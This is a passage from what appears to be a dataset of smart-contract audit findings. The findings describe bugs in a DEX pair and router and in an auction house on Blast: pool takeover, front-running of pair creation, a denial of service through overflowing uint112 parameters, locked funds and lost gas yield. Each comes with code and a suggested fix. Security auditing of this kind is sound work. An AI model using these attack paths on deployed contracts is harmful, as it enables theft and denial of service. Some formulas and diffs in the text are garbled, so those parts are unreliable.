initialTokenMatch)/(virtualEth + bootstrapEth)) + + (virtualEthinitialTokenMatchbootstrapEth)/(virtualEth + bootstrapEth) ^ 2) = = ((virtualEth * initialTokenMatch)/(virtualEth + bootstrapEth)) - 
(virtualEthinitialTokenMatchbootstrapEth)/(virtualEth + bootstrapEth) ^ 2 L251:tokenAmountOptimal = wethDesired * wethReserve / tokenReserve vars.tokenAmount = tokenAmountOptimal vars.wethAmount = wethDesired\\nAt this time, At this time, the calculated balance of ETH and token is sent to the pool, and `GoatV1Pair(vars.pair).mint()` is called in the `GoatRouterV1.sol#addLiquidity()` function.\\n```\\n function addLiquidity(\\n address token,\\n uint256 tokenDesired,\\n uint256 wethDesired,\\n uint256 tokenMin,\\n uint256 wethMin,\\n address to,\\n uint256 deadline,\\n GoatTypes.InitParams memory initParams\\n ) external nonReentrant ensure(deadline) returns (uint256, uint256, uint256) {\\n// rest of codeSNIP\\n IERC20(vars.token).safeTransferFrom(msg.sender, vars.pair, vars.actualTokenAmount);\\n if (vars.wethAmount != 0) {\\n IERC20(WETH).safeTransferFrom(msg.sender, vars.pair, vars.wethAmount);\\n }\\n vars.liquidity = GoatV1Pair(vars.pair).mint(to);\\n// rest of codeSNIP\\n }\\n```\\n\\nNext, the `GoatV1Pair(vars.pair).mint()` function checks the validity of the transmitted token.\\n```\\n function mint(address to) external nonReentrant returns (uint256 liquidity) {\\n // rest of codeSNIP\\n if (_vestingUntil == _MAX_UINT32) {\\n // Do not allow to add liquidity in presale period\\n if (totalSupply_ > 0) revert GoatErrors.PresalePeriod();\\n // don't allow to send more eth than bootstrap eth\\n if (balanceEth > mintVars.bootstrapEth) {\\n revert GoatErrors.SupplyMoreThanBootstrapEth();\\n }\\n\\n if (balanceEth < mintVars.bootstrapEth) {\\n (uint256 tokenAmtForPresale, uint256 tokenAmtForAmm) = _tokenAmountsForLiquidityBootstrap(\\n mintVars.virtualEth, mintVars.bootstrapEth, balanceEth, mintVars.initialTokenMatch\\n );\\n if (balanceToken != (tokenAmtForPresale + tokenAmtForAmm)) {\\n revert GoatErrors.InsufficientTokenAmount();\\n }\\n liquidity =\\n Math.sqrt(uint256(mintVars.virtualEth) * uint256(mintVars.initialTokenMatch)) - MINIMUM_LIQUIDITY;\\n } else 
{\\n // This means that user is willing to make this pool an amm pool in first liquidity mint\\n liquidity = Math.sqrt(balanceEth * balanceToken) - MINIMUM_LIQUIDITY;\\n uint32 timestamp = uint32(block.timestamp);\\n _vestingUntil = timestamp + VESTING_PERIOD;\\n }\\n mintVars.isFirstMint = true;\\n }\\n // rest of codeSNIP\\n }\\n```\\n\\nIn here, `balanceToken = vars.tokenAmount (value:tokenAmountOptimal)` and `tokenAmtForPresale + tokenAmtForAmm` is calculated follows.\\ntokenAmtForPresale = initialTokenMatch - (virtualEth * initialTokenMatch / (virtualEth + bootstrapEth)) - - (balanceEth(value:wethDesired)*initialTokenMatch/(virtualEth+balanceEth)) tokenAmtForAmm = (virtualEth * initialTokenMatch * bootstrapEth) / (virtualEth + bootstrapEth) ^ 2\\nAs a result, `(balanceToken != (tokenAmtForPresale + tokenAmtForAmm)) == true`, the `GoatRouterV1.sol#addLiquidity()` function is reverted. In this case, If the initial LP want to provide liquidity to the pool, he must pay an amount of WETH equivalent to bootstrapEth to execute #L146. 
As a result, the bootstrap function is broken.\\nBased on this fact, an attacker can front run the `createPair()` function if he finds the `addLiquidity()` function in the mempool.",It is recommended that the `GoatV1Factory.sol#.createPair()` function be called only from the `GoatRouterV1` contract.,The bootstrap function of the protocol is broken and the initial LP must pay an amount of WETH equivalent to bootstrapEth.,"```\\n function _addLiquidity(\\n address token,\\n uint256 tokenDesired,\\n uint256 wethDesired,\\n uint256 tokenMin,\\n uint256 wethMin,\\n GoatTypes.InitParams memory initParams\\n ) internal returns (uint256, uint256, bool) {\\n GoatTypes.LocalVariables_AddLiquidity memory vars;\\n GoatV1Pair pair = GoatV1Pair(GoatV1Factory(FACTORY).getPool(token));\\n if (address(pair) == address(0)) {\\n // First time liquidity provider\\n pair = GoatV1Pair(GoatV1Factory(FACTORY).createPair(token, initParams));\\n vars.isNewPair = true;\\n }\\n\\n if (vars.isNewPair) {\\n// rest of codeSNIP\\n } else {\\n /**\\n * @dev This block is accessed after the presale period is over and the pool is converted to AMM\\n */\\n (uint256 wethReserve, uint256 tokenReserve) = pair.getReserves();\\n uint256 tokenAmountOptimal = GoatLibrary.quote(wethDesired, wethReserve, tokenReserve);\\n if (tokenAmountOptimal <= tokenDesired) {\\n if (tokenAmountOptimal < tokenMin) {\\n revert GoatErrors.InsufficientTokenAmount();\\n }\\n (vars.tokenAmount, vars.wethAmount) = (tokenAmountOptimal, wethDesired);\\n } else {\\n uint256 wethAmountOptimal = GoatLibrary.quote(tokenDesired, tokenReserve, wethReserve);\\n assert(wethAmountOptimal <= wethDesired);\\n if (wethAmountOptimal < wethMin) revert GoatErrors.InsufficientWethAmount();\\n (vars.tokenAmount, vars.wethAmount) = (tokenDesired, wethAmountOptimal);\\n }\\n }\\n return (vars.tokenAmount, vars.wethAmount, vars.isNewPair);\\n }\\n```\\n" +No check for `initialEth` in `GoatV1Pair.takeOverPool()`.,medium,"GoatV1Pair.takeOverPool() only 
checks the amount of `token` for initialization, not `initialETH`.\\n```\\n function takeOverPool(GoatTypes.InitParams memory initParams) external {\\n if (_vestingUntil != _MAX_UINT32) {\\n revert GoatErrors.ActionNotAllowed();\\n }\\n\\n GoatTypes.InitialLPInfo memory initialLpInfo = _initialLPInfo;\\n\\n GoatTypes.LocalVariables_TakeOverPool memory localVars;\\n address to = msg.sender;\\n localVars.virtualEthOld = _virtualEth;\\n localVars.bootstrapEthOld = _bootstrapEth;\\n localVars.initialTokenMatchOld = _initialTokenMatch;\\n\\n (localVars.tokenAmountForPresaleOld, localVars.tokenAmountForAmmOld) = _tokenAmountsForLiquidityBootstrap(\\n localVars.virtualEthOld,\\n localVars.bootstrapEthOld,\\n initialLpInfo.initialWethAdded,\\n localVars.initialTokenMatchOld\\n );\\n\\n // new token amount for bootstrap if no swaps would have occured\\n (localVars.tokenAmountForPresaleNew, localVars.tokenAmountForAmmNew) = _tokenAmountsForLiquidityBootstrap(\\n initParams.virtualEth, initParams.bootstrapEth, initParams.initialEth, initParams.initialTokenMatch\\n );\\n\\n // team needs to add min 10% more tokens than the initial lp to take over\\n localVars.minTokenNeeded =\\n ((localVars.tokenAmountForPresaleOld + localVars.tokenAmountForAmmOld) * 11000) / 10000;\\n\\n481 if ((localVars.tokenAmountForAmmNew + localVars.tokenAmountForPresaleNew) < localVars.minTokenNeeded) {\\n revert GoatErrors.InsufficientTakeoverTokenAmount();\\n }\\n\\n localVars.reserveEth = _reserveEth;\\n\\n // Actual token amounts needed if the reserves have updated after initial lp mint\\n (localVars.tokenAmountForPresaleNew, localVars.tokenAmountForAmmNew) = _tokenAmountsForLiquidityBootstrap(\\n initParams.virtualEth, initParams.bootstrapEth, localVars.reserveEth, initParams.initialTokenMatch\\n );\\n localVars.reserveToken = _reserveToken;\\n\\n // amount of tokens transferred by the new team\\n uint256 tokenAmountIn = IERC20(_token).balanceOf(address(this)) - localVars.reserveToken;\\n\\n if 
(\\n tokenAmountIn\\n < (\\n localVars.tokenAmountForPresaleOld + localVars.tokenAmountForAmmOld - localVars.reserveToken\\n + localVars.tokenAmountForPresaleNew + localVars.tokenAmountForAmmNew\\n )\\n ) {\\n revert GoatErrors.IncorrectTokenAmount();\\n }\\n\\n localVars.pendingLiquidityFees = _pendingLiquidityFees;\\n localVars.pendingProtocolFees = _pendingProtocolFees;\\n\\n // amount of weth transferred by the new team\\n uint256 wethAmountIn = IERC20(_weth).balanceOf(address(this)) - localVars.reserveEth\\n - localVars.pendingLiquidityFees - localVars.pendingProtocolFees;\\n\\n if (wethAmountIn < localVars.reserveEth) {\\n revert GoatErrors.IncorrectWethAmount();\\n }\\n\\n _handleTakeoverTransfers(\\n IERC20(_weth), IERC20(_token), initialLpInfo.liquidityProvider, localVars.reserveEth, localVars.reserveToken\\n );\\n\\n uint256 lpBalance = balanceOf(initialLpInfo.liquidityProvider);\\n _burn(initialLpInfo.liquidityProvider, lpBalance);\\n\\n // new lp balance\\n lpBalance = Math.sqrt(uint256(initParams.virtualEth) * initParams.initialTokenMatch) - MINIMUM_LIQUIDITY;\\n _mint(to, lpBalance);\\n\\n _updateStateAfterTakeover(\\n initParams.virtualEth,\\n initParams.bootstrapEth,\\n initParams.initialTokenMatch,\\n wethAmountIn,\\n tokenAmountIn,\\n lpBalance,\\n to,\\n initParams.initialEth\\n );\\n }\\n```\\n\\nAlthough there is a check for the amount of `token` at L481, if the caller sets `initParams.initialEth` to 0, it can easily pass L481 because a smaller `initParams.initialEth` results in a larger `localVars.tokenAmountForAmmNew + localVars.tokenAmountForPresaleNew`. 
This is due to the fact that the former initial provider's `initialEth` does not have any effect in preventing takeovers.",There should be a check for `initParams.initialEth`.,A pool could be unfairly taken over because the former initial provider's `initialEth` does not have any effect in preventing takeovers.,"```\\n function takeOverPool(GoatTypes.InitParams memory initParams) external {\\n if (_vestingUntil != _MAX_UINT32) {\\n revert GoatErrors.ActionNotAllowed();\\n }\\n\\n GoatTypes.InitialLPInfo memory initialLpInfo = _initialLPInfo;\\n\\n GoatTypes.LocalVariables_TakeOverPool memory localVars;\\n address to = msg.sender;\\n localVars.virtualEthOld = _virtualEth;\\n localVars.bootstrapEthOld = _bootstrapEth;\\n localVars.initialTokenMatchOld = _initialTokenMatch;\\n\\n (localVars.tokenAmountForPresaleOld, localVars.tokenAmountForAmmOld) = _tokenAmountsForLiquidityBootstrap(\\n localVars.virtualEthOld,\\n localVars.bootstrapEthOld,\\n initialLpInfo.initialWethAdded,\\n localVars.initialTokenMatchOld\\n );\\n\\n // new token amount for bootstrap if no swaps would have occured\\n (localVars.tokenAmountForPresaleNew, localVars.tokenAmountForAmmNew) = _tokenAmountsForLiquidityBootstrap(\\n initParams.virtualEth, initParams.bootstrapEth, initParams.initialEth, initParams.initialTokenMatch\\n );\\n\\n // team needs to add min 10% more tokens than the initial lp to take over\\n localVars.minTokenNeeded =\\n ((localVars.tokenAmountForPresaleOld + localVars.tokenAmountForAmmOld) * 11000) / 10000;\\n\\n481 if ((localVars.tokenAmountForAmmNew + localVars.tokenAmountForPresaleNew) < localVars.minTokenNeeded) {\\n revert GoatErrors.InsufficientTakeoverTokenAmount();\\n }\\n\\n localVars.reserveEth = _reserveEth;\\n\\n // Actual token amounts needed if the reserves have updated after initial lp mint\\n (localVars.tokenAmountForPresaleNew, localVars.tokenAmountForAmmNew) = _tokenAmountsForLiquidityBootstrap(\\n initParams.virtualEth, initParams.bootstrapEth, 
localVars.reserveEth, initParams.initialTokenMatch\\n );\\n localVars.reserveToken = _reserveToken;\\n\\n // amount of tokens transferred by the new team\\n uint256 tokenAmountIn = IERC20(_token).balanceOf(address(this)) - localVars.reserveToken;\\n\\n if (\\n tokenAmountIn\\n < (\\n localVars.tokenAmountForPresaleOld + localVars.tokenAmountForAmmOld - localVars.reserveToken\\n + localVars.tokenAmountForPresaleNew + localVars.tokenAmountForAmmNew\\n )\\n ) {\\n revert GoatErrors.IncorrectTokenAmount();\\n }\\n\\n localVars.pendingLiquidityFees = _pendingLiquidityFees;\\n localVars.pendingProtocolFees = _pendingProtocolFees;\\n\\n // amount of weth transferred by the new team\\n uint256 wethAmountIn = IERC20(_weth).balanceOf(address(this)) - localVars.reserveEth\\n - localVars.pendingLiquidityFees - localVars.pendingProtocolFees;\\n\\n if (wethAmountIn < localVars.reserveEth) {\\n revert GoatErrors.IncorrectWethAmount();\\n }\\n\\n _handleTakeoverTransfers(\\n IERC20(_weth), IERC20(_token), initialLpInfo.liquidityProvider, localVars.reserveEth, localVars.reserveToken\\n );\\n\\n uint256 lpBalance = balanceOf(initialLpInfo.liquidityProvider);\\n _burn(initialLpInfo.liquidityProvider, lpBalance);\\n\\n // new lp balance\\n lpBalance = Math.sqrt(uint256(initParams.virtualEth) * initParams.initialTokenMatch) - MINIMUM_LIQUIDITY;\\n _mint(to, lpBalance);\\n\\n _updateStateAfterTakeover(\\n initParams.virtualEth,\\n initParams.bootstrapEth,\\n initParams.initialTokenMatch,\\n wethAmountIn,\\n tokenAmountIn,\\n lpBalance,\\n to,\\n initParams.initialEth\\n );\\n }\\n```\\n" +Legitimate pools can be taken over and the penalty is not fair.,medium,"In GoatV1Pair.takeOverPool(), a malicious user can take over pool from a legitimate user, because the mechanism for identifying is incorrect. And the penalty mechanism is not fair.\\nGoatV1Pair.takeOverPool() function exists to avoid grief, because only one pool can be created for each token. 
Doc says ""They can then lower the amount of virtual Ether or Ether to be raised, but not make it higher."" about GoatV1Pair.takeOverPool(). However, there is no checking for the amount of virtual Ether. This made it possible that legitimate pools can be taken over by malicious users.\\nL481 and L496 checks the amount of tokens, but there is no check for virtual Ether or Ether to be raised. So, a malicious user can take over a legitimate pool without any cost. He can remove his cost by increasing the amount of virtual Ether or reserved Ether. Paying +10 percent token can do nothing with it. Furthermore, the old liquidity provider should pay 5% penalty. This is very unfair. Generally, a malicious user have no Ether reserved. So, it is only harmful to legitimate users.\\n```\\n function takeOverPool(GoatTypes.InitParams memory initParams) external {\\n if (_vestingUntil != _MAX_UINT32) {\\n revert GoatErrors.ActionNotAllowed();\\n }\\n\\n GoatTypes.InitialLPInfo memory initialLpInfo = _initialLPInfo;\\n\\n GoatTypes.LocalVariables_TakeOverPool memory localVars;\\n address to = msg.sender;\\n localVars.virtualEthOld = _virtualEth;\\n localVars.bootstrapEthOld = _bootstrapEth;\\n localVars.initialTokenMatchOld = _initialTokenMatch;\\n\\n (localVars.tokenAmountForPresaleOld, localVars.tokenAmountForAmmOld) = _tokenAmountsForLiquidityBootstrap(\\n localVars.virtualEthOld,\\n localVars.bootstrapEthOld,\\n initialLpInfo.initialWethAdded,\\n localVars.initialTokenMatchOld\\n );\\n\\n // new token amount for bootstrap if no swaps would have occured\\n (localVars.tokenAmountForPresaleNew, localVars.tokenAmountForAmmNew) = _tokenAmountsForLiquidityBootstrap(\\n initParams.virtualEth, initParams.bootstrapEth, initParams.initialEth, initParams.initialTokenMatch\\n );\\n\\n // team needs to add min 10% more tokens than the initial lp to take over\\n localVars.minTokenNeeded =\\n ((localVars.tokenAmountForPresaleOld + localVars.tokenAmountForAmmOld) * 11000) / 10000;\\n\\n481 if 
((localVars.tokenAmountForAmmNew + localVars.tokenAmountForPresaleNew) < localVars.minTokenNeeded) {\\n revert GoatErrors.InsufficientTakeoverTokenAmount();\\n }\\n\\n localVars.reserveEth = _reserveEth;\\n\\n // Actual token amounts needed if the reserves have updated after initial lp mint\\n (localVars.tokenAmountForPresaleNew, localVars.tokenAmountForAmmNew) = _tokenAmountsForLiquidityBootstrap(\\n initParams.virtualEth, initParams.bootstrapEth, localVars.reserveEth, initParams.initialTokenMatch\\n );\\n localVars.reserveToken = _reserveToken;\\n\\n // amount of tokens transferred by the new team\\n uint256 tokenAmountIn = IERC20(_token).balanceOf(address(this)) - localVars.reserveToken;\\n\\n if (\\n496 tokenAmountIn\\n497 < (\\n498 localVars.tokenAmountForPresaleOld + localVars.tokenAmountForAmmOld - localVars.reserveToken\\n499 + localVars.tokenAmountForPresaleNew + localVars.tokenAmountForAmmNew\\n500 )\\n ) {\\n revert GoatErrors.IncorrectTokenAmount();\\n }\\n\\n localVars.pendingLiquidityFees = _pendingLiquidityFees;\\n localVars.pendingProtocolFees = _pendingProtocolFees;\\n\\n // amount of weth transferred by the new team\\n uint256 wethAmountIn = IERC20(_weth).balanceOf(address(this)) - localVars.reserveEth\\n - localVars.pendingLiquidityFees - localVars.pendingProtocolFees;\\n\\n if (wethAmountIn < localVars.reserveEth) {\\n revert GoatErrors.IncorrectWethAmount();\\n }\\n\\n _handleTakeoverTransfers(\\n IERC20(_weth), IERC20(_token), initialLpInfo.liquidityProvider, localVars.reserveEth, localVars.reserveToken\\n );\\n\\n uint256 lpBalance = balanceOf(initialLpInfo.liquidityProvider);\\n _burn(initialLpInfo.liquidityProvider, lpBalance);\\n\\n // new lp balance\\n lpBalance = Math.sqrt(uint256(initParams.virtualEth) * initParams.initialTokenMatch) - MINIMUM_LIQUIDITY;\\n _mint(to, lpBalance);\\n\\n _updateStateAfterTakeover(\\n initParams.virtualEth,\\n initParams.bootstrapEth,\\n initParams.initialTokenMatch,\\n wethAmountIn,\\n tokenAmountIn,\\n 
lpBalance,\\n to,\\n initParams.initialEth\\n );\\n }\\n```\\n",I think that the mechanism for identifying should be improved.,Legitimate pools can be taken over unfairly.,"```\\n function takeOverPool(GoatTypes.InitParams memory initParams) external {\\n if (_vestingUntil != _MAX_UINT32) {\\n revert GoatErrors.ActionNotAllowed();\\n }\\n\\n GoatTypes.InitialLPInfo memory initialLpInfo = _initialLPInfo;\\n\\n GoatTypes.LocalVariables_TakeOverPool memory localVars;\\n address to = msg.sender;\\n localVars.virtualEthOld = _virtualEth;\\n localVars.bootstrapEthOld = _bootstrapEth;\\n localVars.initialTokenMatchOld = _initialTokenMatch;\\n\\n (localVars.tokenAmountForPresaleOld, localVars.tokenAmountForAmmOld) = _tokenAmountsForLiquidityBootstrap(\\n localVars.virtualEthOld,\\n localVars.bootstrapEthOld,\\n initialLpInfo.initialWethAdded,\\n localVars.initialTokenMatchOld\\n );\\n\\n // new token amount for bootstrap if no swaps would have occured\\n (localVars.tokenAmountForPresaleNew, localVars.tokenAmountForAmmNew) = _tokenAmountsForLiquidityBootstrap(\\n initParams.virtualEth, initParams.bootstrapEth, initParams.initialEth, initParams.initialTokenMatch\\n );\\n\\n // team needs to add min 10% more tokens than the initial lp to take over\\n localVars.minTokenNeeded =\\n ((localVars.tokenAmountForPresaleOld + localVars.tokenAmountForAmmOld) * 11000) / 10000;\\n\\n481 if ((localVars.tokenAmountForAmmNew + localVars.tokenAmountForPresaleNew) < localVars.minTokenNeeded) {\\n revert GoatErrors.InsufficientTakeoverTokenAmount();\\n }\\n\\n localVars.reserveEth = _reserveEth;\\n\\n // Actual token amounts needed if the reserves have updated after initial lp mint\\n (localVars.tokenAmountForPresaleNew, localVars.tokenAmountForAmmNew) = _tokenAmountsForLiquidityBootstrap(\\n initParams.virtualEth, initParams.bootstrapEth, localVars.reserveEth, initParams.initialTokenMatch\\n );\\n localVars.reserveToken = _reserveToken;\\n\\n // amount of tokens transferred by the new 
team\\n uint256 tokenAmountIn = IERC20(_token).balanceOf(address(this)) - localVars.reserveToken;\\n\\n if (\\n496 tokenAmountIn\\n497 < (\\n498 localVars.tokenAmountForPresaleOld + localVars.tokenAmountForAmmOld - localVars.reserveToken\\n499 + localVars.tokenAmountForPresaleNew + localVars.tokenAmountForAmmNew\\n500 )\\n ) {\\n revert GoatErrors.IncorrectTokenAmount();\\n }\\n\\n localVars.pendingLiquidityFees = _pendingLiquidityFees;\\n localVars.pendingProtocolFees = _pendingProtocolFees;\\n\\n // amount of weth transferred by the new team\\n uint256 wethAmountIn = IERC20(_weth).balanceOf(address(this)) - localVars.reserveEth\\n - localVars.pendingLiquidityFees - localVars.pendingProtocolFees;\\n\\n if (wethAmountIn < localVars.reserveEth) {\\n revert GoatErrors.IncorrectWethAmount();\\n }\\n\\n _handleTakeoverTransfers(\\n IERC20(_weth), IERC20(_token), initialLpInfo.liquidityProvider, localVars.reserveEth, localVars.reserveToken\\n );\\n\\n uint256 lpBalance = balanceOf(initialLpInfo.liquidityProvider);\\n _burn(initialLpInfo.liquidityProvider, lpBalance);\\n\\n // new lp balance\\n lpBalance = Math.sqrt(uint256(initParams.virtualEth) * initParams.initialTokenMatch) - MINIMUM_LIQUIDITY;\\n _mint(to, lpBalance);\\n\\n _updateStateAfterTakeover(\\n initParams.virtualEth,\\n initParams.bootstrapEth,\\n initParams.initialTokenMatch,\\n wethAmountIn,\\n tokenAmountIn,\\n lpBalance,\\n to,\\n initParams.initialEth\\n );\\n }\\n```\\n" +The router is not compatible with fee on transfers tokens,medium,"The router is not compatible with fee on transfers tokens.\\nLet's take as example the removeLiquidity function:\\n```\\naddress pair = GoatV1Factory(FACTORY).getPool(token);\\n\\nIERC20(pair).safeTransferFrom(msg.sender, pair, liquidity); //-> 1. Transfers liquidity tokens to the pair\\n(amountWeth, amountToken) = GoatV1Pair(pair).burn(to); //-> 2. Burns the liquidity tokens and sends WETH and TOKEN to the recipient\\nif (amountWeth < wethMin) { //-> 3. 
Ensures enough WETH has been transferred\\n revert GoatErrors.InsufficientWethAmount();\\n}\\nif (amountToken < tokenMin) { //4. Ensures enough TOKEN has been transferred\\n revert GoatErrors.InsufficientTokenAmount();\\n}\\n```\\n\\nIt does the following:\\nTransfers liquidity tokens `to` the pair.\\nBurns the liquidity tokens and sends WETH and TOKEN `to` the recipient `to`.\\nEnsures enough WETH has been transferred.\\nEnsures enough TOKEN has been transferred.\\nAt point `4` the router doesn't account for the fee paid to transfer TOKEN. The recipient didn't actually receive `amountToken`, but slightly less because a fee has been charged.\\nAnother interesting example is the removeLiquidityETH which first burns the liquidity and transfers the tokens to the router itself, and then from the router the tokens are transferred to the recipient. This will charge double the fees.\\nThis is just two examples to highlight the fact that these kind of tokens are not supported, but the other functions in the router have similar issues that can cause all sorts of trouble including reverts and loss of funds.","Add functionality to the router to support fee on transfer tokens, a good example of where this is correctly implememented is the Uniswap Router02.",The router is not compatible with fee on transfers tokens.,"```\\naddress pair = GoatV1Factory(FACTORY).getPool(token);\\n\\nIERC20(pair).safeTransferFrom(msg.sender, pair, liquidity); //-> 1. Transfers liquidity tokens to the pair\\n(amountWeth, amountToken) = GoatV1Pair(pair).burn(to); //-> 2. Burns the liquidity tokens and sends WETH and TOKEN to the recipient\\nif (amountWeth < wethMin) { //-> 3. Ensures enough WETH has been transferred\\n revert GoatErrors.InsufficientWethAmount();\\n}\\nif (amountToken < tokenMin) { //4. 
Ensures enough TOKEN has been transferred\\n    revert GoatErrors.InsufficientTokenAmount();\\n}\\n```\\n" +It's possible to create pairs that cannot be taken over,medium,"It's possible to create pairs that cannot be taken over and DOS a pair forever.\\nA pair is created by calling createPair() which takes the initial parameters of the pair as inputs but the initial parameters are never verified, which makes it possible for an attacker to create a token pair that's impossible to recover via takeOverPool().\\nThere are more ways to create a pair that cannot be taken over; a simple example is to set all of the initial parameters to the maximum possible value:\\n```\\nuint112 virtualEth = type(uint112).max;\\nuint112 bootstrapEth = type(uint112).max;\\nuint112 initialEth = type(uint112).max;\\nuint112 initialTokenMatch = type(uint112).max;\\n```\\n\\nThis will make takeOverPool() revert for overflow on the internal call to _tokenAmountsForLiquidityBootstrap:\\n```\\nuint256 k = virtualEth * initialTokenMatch;\\n        tokenAmtForAmm = (k * bootstrapEth) / (totalEth * totalEth);\\n```\\n\\nHere `virtualEth`, `initialTokenMatch` and `bootstrapEth` are all set to `type(uint112).max`. The multiplication `virtualEth` * `initialTokenMatch` * `bootstrapEth` performed to calculate `tokenAmtForAmm` will revert for overflow because `2^112 * 2^112 * 2^112 = 2^336` which is bigger than `2^256`.",Validate a pair's initial parameters and mint liquidity on pool creation.,Creation of new pairs can be DOSed forever.,```\\nuint112 virtualEth = type(uint112).max;\\nuint112 bootstrapEth = type(uint112).max;\\nuint112 initialEth = type(uint112).max;\\nuint112 initialTokenMatch = type(uint112).max;\\n```\\n +[M-1],high,"Seller's funds may remain locked in the protocol, because of revert on 0 transfer tokens. 
In the README.md file is stated that the protocol uses every token with ERC20 Metadata and decimals between 6-18, which includes some revert on 0 transfer tokens, so this should be considered as valid issue!\\nin the `AuctionHouse::claimProceeds()` function there is the following block of code:\\n```\\n uint96 prefundingRefund = routing.funding + payoutSent_ - sold_;\\n unchecked {\\n routing.funding -= prefundingRefund;\\n }\\n Transfer.transfer(\\n routing.baseToken,\\n _getAddressGivenCallbackBaseTokenFlag(routing.callbacks, routing.seller),\\n prefundingRefund,\\n false\\n );\\n```\\n\\nSince the batch auctions must be prefunded so `routing.funding` shouldn't be zero unless all the tokens were sent in settle, in which case `payoutSent` will equal `sold_`. From this we make the conclusion that it is possible for `prefundingRefund` to be equal to 0. This means if the `routing.baseToken` is a revert on 0 transfer token the seller will never be able to get the `quoteToken` he should get from the auction.","Check if the `prefundingRefund > 0` like this:\\n```\\n function claimProceeds(\\n uint96 lotId_,\\n bytes calldata callbackData_\\n ) external override nonReentrant {\\n // Validation\\n _isLotValid(lotId_);\\n\\n // Call auction module to validate and update data\\n (uint96 purchased_, uint96 sold_, uint96 payoutSent_) =\\n _getModuleForId(lotId_).claimProceeds(lotId_);\\n\\n // Load data for the lot\\n Routing storage routing = lotRouting[lotId_];\\n\\n // Calculate the referrer and protocol fees for the amount in\\n // Fees are not allocated until the user claims their payout so that we don't have to iterate through them here\\n // If a referrer is not set, that portion of the fee defaults to the protocol\\n uint96 totalInLessFees;\\n {\\n (, uint96 toProtocol) = calculateQuoteFees(\\n lotFees[lotId_].protocolFee, lotFees[lotId_].referrerFee, false, purchased_\\n );\\n unchecked {\\n totalInLessFees = purchased_ - toProtocol;\\n }\\n }\\n\\n // Send payment 
in bulk to the address dictated by the callbacks address\\n // If the callbacks contract is configured to receive quote tokens, send the quote tokens to the callbacks contract and call the onClaimProceeds callback\\n // If not, send the quote tokens to the seller and call the onClaimProceeds callback\\n _sendPayment(routing.seller, totalInLessFees, routing.quoteToken, routing.callbacks);\\n\\n // Refund any unused capacity and curator fees to the address dictated by the callbacks address\\n // By this stage, a partial payout (if applicable) and curator fees have been paid, leaving only the payout amount (`totalOut`) remaining.\\n uint96 prefundingRefund = routing.funding // Add the line below\\n payoutSent_ - sold_;\\n// Add the line below\\n// Add the line below\\n if(prefundingRefund > 0) { \\n unchecked {\\n routing.funding -= prefundingRefund;\\n }\\n Transfer.transfer(\\n routing.baseToken,\\n _getAddressGivenCallbackBaseTokenFlag(routing.callbacks, routing.seller),\\n prefundingRefund,\\n false\\n );\\n// Add the line below\\n// Add the line below\\n }\\n \\n\\n // Call the onClaimProceeds callback\\n Callbacks.onClaimProceeds(\\n routing.callbacks, lotId_, totalInLessFees, prefundingRefund, callbackData_\\n );\\n }\\n```\\n",The seller's funds remain locked in the system and he will never be able to get them back.,"```\\n uint96 prefundingRefund = routing.funding + payoutSent_ - sold_;\\n unchecked {\\n routing.funding -= prefundingRefund;\\n }\\n Transfer.transfer(\\n routing.baseToken,\\n _getAddressGivenCallbackBaseTokenFlag(routing.callbacks, routing.seller),\\n prefundingRefund,\\n false\\n );\\n```\\n" +Module's gas yield can never be claimed and all yield will be lost,high,"Module's gas yield can never be claimed\\nThe protocol is meant to be deployed on blast, meaning that the gas and ether balance accrue yield.\\nBy default these yield settings for both ETH and GAS yields are set to VOID as default, meaning that unless we configure the yield mode to 
claimable, we will be unable to receive the yield. The protocol never sets gas to claimable for the modules; the governor of the contract is the auction house, and the auction house also does not implement any function to set the modules' gas yield to claimable.\\n```\\n constructor(address auctionHouse_) LinearVesting(auctionHouse_) BlastGas(auctionHouse_) {}\\n```\\n\\nThe constructor of both BlastLinearVesting and BlastEMPAM sets the auction house here (`BlastGas(auctionHouse_)`); if we look at this contract we can observe the above.\\nBlastGas.sol\\n```\\n    constructor(address parent_) {\\n        // Configure governor to claim gas fees\\n        IBlast(0x4300000000000000000000000000000000000002).configureGovernor(parent_);\\n    }\\n```\\n\\nAs we can see above, the governor is set in the constructor, but we never set gas to claimable. Gas yield mode will be in its default mode, which is VOID, so the modules will not accrue gas yields. Since these modules never set gas yield mode to claimable, the auction house cannot claim any gas yield for either of the contracts. 
Additionally, the auction house includes no function to configure yield mode; the auction house contract only has a function to claim the gas yield, but this will revert since the yield mode for these module contracts will be VOID.","Change the following in the BlastGas contract; this will set the gas yield of the modules to claimable in the constructor, allowing the auction house to claim gas yield.\\n```\\ninterface IBlast {\\n    function configureGovernor(address governor_) external;\\n    function configureClaimableGas() external; \\n}\\n\\nabstract contract BlastGas {\\n    // ========== CONSTRUCTOR ========== //\\n\\n    constructor(address parent_) {\\n        // Configure governor to claim gas fees\\n        IBlast(0x4300000000000000000000000000000000000002).configureClaimableGas();\\n        IBlast(0x4300000000000000000000000000000000000002).configureGovernor(parent_);\\n    }\\n}\\n```\\n",Gas yields will never accrue and the yield will forever be lost,```\\n constructor(address auctionHouse_) LinearVesting(auctionHouse_) BlastGas(auctionHouse_) {}\\n```\\n +Auction creators have the ability to lock bidders' funds.,high,"`Auction creators` have the ability to cancel an `auction` before it starts. However, once the `auction` begins, they should not be allowed to cancel it. During the `auction`, `bidders` can place `bids` and send `quote` tokens to the `auction` house. After the `auction` concludes, `bidders` can either receive `base` tokens or retrieve their `quote` tokens. Unfortunately, batch `auction` creators can cancel an `auction` when it ends. This means that `auction` creators can cancel their `auctions` if they anticipate `losses`. This should not be allowed. 
The significant risk is that `bidders' funds` could become locked in the `auction` house.\\n`Auction creators` can not cancel an `auction` once it concludes.\\n```\\nfunction cancelAuction(uint96 lotId_) external override onlyInternal {\\n _revertIfLotConcluded(lotId_);\\n}\\n```\\n\\nThey also can not cancel it while it is active.\\n```\\nfunction _cancelAuction(uint96 lotId_) internal override {\\n _revertIfLotActive(lotId_);\\n\\n auctionData[lotId_].status = Auction.Status.Claimed;\\n}\\n```\\n\\nWhen the `block.timestamp` aligns with the `conclusion` time of the `auction`, we can bypass these checks.\\n```\\nfunction _revertIfLotConcluded(uint96 lotId_) internal view virtual {\\n if (lotData[lotId_].conclusion < uint48(block.timestamp)) {\\n revert Auction_MarketNotActive(lotId_);\\n }\\n\\n if (lotData[lotId_].capacity == 0) revert Auction_MarketNotActive(lotId_);\\n}\\nfunction _revertIfLotActive(uint96 lotId_) internal view override {\\n if (\\n auctionData[lotId_].status == Auction.Status.Created\\n && lotData[lotId_].start <= block.timestamp\\n && lotData[lotId_].conclusion > block.timestamp\\n ) 